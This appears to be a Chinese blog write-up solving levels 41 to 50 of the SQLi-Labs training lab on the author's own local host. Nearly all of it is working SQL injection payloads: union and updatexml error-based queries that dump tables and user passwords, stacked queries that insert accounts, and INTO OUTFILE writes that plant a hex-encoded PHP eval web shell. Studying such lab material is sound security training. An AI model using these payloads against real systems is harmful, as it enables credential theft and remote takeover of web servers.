• SQL-LIBS 41-50通关过程


    第41关

    爆库
    http://www.guiltyfet.com/sqli/Less-41/?id=0 union%20select 1,version(),database() %23
    
    • 1
    • 2

    在这里插入图片描述

    爆表
    http://www.guiltyfet.com/sqli/Less-41/?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23
    
    • 1
    • 2

    在这里插入图片描述

    爆字段
    http://www.guiltyfet.com/sqli/Less-41/?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 %23
    
    • 1
    • 2

    在这里插入图片描述

    爆密码
    http://www.guiltyfet.com/sqli/Less-41/?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 %23
    
    • 1
    • 2

    在这里插入图片描述

    第42关

    密码处的报错注入
    -1’ union select 1,database(),3#
    在这里插入图片描述

    利用password来注入,新建表用户名随意填写,密码如下

    a’;create table guiltyfet like users;#

    在这里插入图片描述

    在这里插入图片描述

    在这里插入图片描述

    1’;insert into users(id,username,password) values(42,‘guiltyfet42’,‘guiltyfet42’)#

    可以简写:1’;insert into users values(42,‘guiltyfet42’,‘guiltyfet42’)#

    在这里插入图片描述

    在这里插入图片描述
    成功登录
    在这里插入图片描述

    第43关

    和上一关一样

    1’);insert into users values(43,‘Less43’,‘Less43’)#

    在这里插入图片描述

    第44关

    1’;insert into users values (‘44’,‘less44’,‘guiltyfet44’)#

    在这里插入图片描述

    在这里插入图片描述

    第45关

    1’);insert into users(id,username,password) values(45,‘guiltyfet45’,‘guiltyfet45’)#

    在这里插入图片描述

    在这里插入图片描述

    第46关

    Please input parameter as SORT with numeric value
    在这里插入图片描述

    sort=1时是第一列Id
    sort=2时是第二列 username
    sort=3时是第三列 password
    当sort=4时报错
    相当于使用order by作为判断字段数
    在这里插入图片描述

    利用报错注入
    爆库
    http://www.guiltyfet.com/sqli/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(database()),0x7e),1)--+
    
    • 1
    • 2
    • 3

    在这里插入图片描述

    表
    http://www.guiltyfet.com/sqli/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+
    
    
    • 1
    • 2
    • 3

    在这里插入图片描述

    查看users表下的所有字段
    http://www.guiltyfet.com/sqli/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)--+
    
    
    • 1
    • 2
    • 3

    在这里插入图片描述

    查看username,password字段下的所有值
    http://www.guiltyfet.com/sqli/Less-46/?sort=1 and updatexml(1,concat(0x7e,(select group_concat(username,password) from security.users),0x7e),1)--+
    
    • 1
    • 2

    在这里插入图片描述

    第47关

    和46关一样加个’

    http://www.guiltyfet.com/sqli/Less-47/?sort=1' and updatexml(1,concat(0x7e,(select group_concat(username,password) from security.users),0x7e),1)--+
    
    • 1

    在这里插入图片描述

    获得数据库版本
    http://www.guiltyfet.com/sqli/Less-47/?sort=1’and (select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x)–+
    在这里插入图片描述

    第48关

    ?sort=1 into outfile “D:\phpstudy_pro\WWW\www.guiltyfet.com\sqli\Less-48\test.php” lines terminated by 0x3c3f706870206576616c28245f504f53545b22636d64225d293b3f3e

    报错了但是成功写入

    其中lines terminates by将每行以指定字符串结尾:
    
    0x3c3f706870206576616c28245f504f53545b22636d64225d293b3f3e = hex(<?php eval($_POST["cmd"]);?>)
    
    • 1
    • 2
    • 3

    在这里插入图片描述

    http://www.guiltyfet.com/sqli/Less-48/123.php
    在这里插入图片描述

    第49关

    http://www.guiltyfet.com/sqli/Less-49/?sort=1%27into%20outfile%20%22D:\\phpstudy_pro\\WWW\\www.guiltyfet.com\\sqli\\Less-49\\149.php%22%20lines%20terminated%20by%200x3c3f70687020706870696e666f28293b3f3e2020--+
    
    • 1

    在这里插入图片描述

    第50关

    http://www.guiltyfet.com/sqli/Less-50/?sort=1;insert into users(id,username,password) values(50,‘guiltyfet50’,‘guiltyfet50’)#

    在这里插入图片描述

    http://www.guiltyfet.com/sqli/Less-50/?sort=1

    在这里插入图片描述

  • 相关阅读:
    ROS自学笔记十七:Arbotix
    Python日期时间差的计算(天/小时/分钟)及timedelta函数的使用(附python代码)
    航天常用术语-双想、九新、六个百分百确认、三图、三类关键特性、可靠性1+6+2、质量问题归零、技术状态更改“五条”原则、四随
    小程序商城框架源码 小程序源码带前端+后台+数据库
    PMP 考试需要注意哪些事项?
    毕业论文GPT说:
    tcp/ip协议和opc协议对比详解
    Java基础进阶多线程-线程安全和synchronized关键字
    使用c++视觉处理----canny 边缘检测、sobel边缘检测、scharr 滤波边缘检测
    深入理解.Net中的线程同步之构造模式(二)内核模式2.内核模式构造物Semaphone
  • 原文地址:https://blog.csdn.net/weixin_51387754/article/details/127420058